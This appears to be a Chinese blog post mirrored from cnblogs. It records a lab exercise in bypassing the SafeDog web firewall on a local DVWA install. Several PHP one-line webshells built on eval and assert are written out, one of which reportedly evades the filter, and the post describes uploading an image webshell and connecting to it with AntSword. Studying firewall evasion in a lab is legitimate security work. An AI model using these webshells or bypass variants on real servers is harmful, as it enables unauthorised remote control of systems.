zoukankan      html  css  js  c++  java
  • 网站WAF-安全狗的绕过(一)

    一、前置准备

    1.先在虚拟机安装phpstudy,建议安装2016的老版phpstudy,因为设置安全狗的时候更加方便

    2.启动phpstudy,将服务设置为系统服务,方便查找名称

    3.下载安全狗Apache版,启动会让设置apache目录和服务名称,名称填上面的服务名

    4.在WWW目录下布置网页

    一开始只是想找个简单的上传网页拿来做实验,但是找了很久没有找到合适的。

    之后干脆把DVWA拿来搭在虚拟机上,需要在配置文件修改数据库名称、用户名、密码,之后服务ip/DVWA/setup.php,结果如下(文件包含漏洞不可用不用管)

    自动跳转到登陆页面,用户名admin,密码password,登陆成功

    二、绕过

    普通的一句话:

    <?php
        @eval($_POST[a]);?>

    先把DVWA靶机等级设为low(不然靶机自己也有过滤),上传一句话被安全狗拦截

    一句话绕过思路:https://xz.aliyun.com/t/5152(版本可能有点老不起作用)

    安全狗对于eval的过滤比较严重,米斯特安全的绕过方法也不可行

    <?php $a=$_POST['x'];$b=$a;@eval($b^$a);?>

    试试看assert语句

    <?php
    
    $a = substr_replace("assexx","rt",4);
    
    $a($_POST['x']);
    
    ?>

    普通的assert语句也被拦截

    能绕过webshell的一句话:

    <?php
    define("hi","$_REQUEST[1]");
    eval(hi);
    ?>

    参考:https://blog.csdn.net/qq_41891666/article/details/106876165?utm_medium=distribute.pc_relevant.none-task-blog-utm_term-9&spm=1001.2101.3001.4242

    现在单靠一句话很难绕过了,要结合其他工具才行

    尝试后缀名绕过,能上传图片马,但是不能修改后缀(报毒),蚁剑直连也会失败

    已知会过滤的:php后缀,还有会拦截webshell

  • 相关阅读:
    将Excel嵌入你的.Net程序
    调用资源文件
    Socket Error# Description
    LPCTSTR 和其它
    linux send and recv详解
    stdafx.h的作用
    setsocketopt() usage
    openfire源码入门级分析
    openfire分析
    关于xmpp
  • 原文地址:https://www.cnblogs.com/echoDetected/p/13737977.html
Copyright © 2011-2022 走看看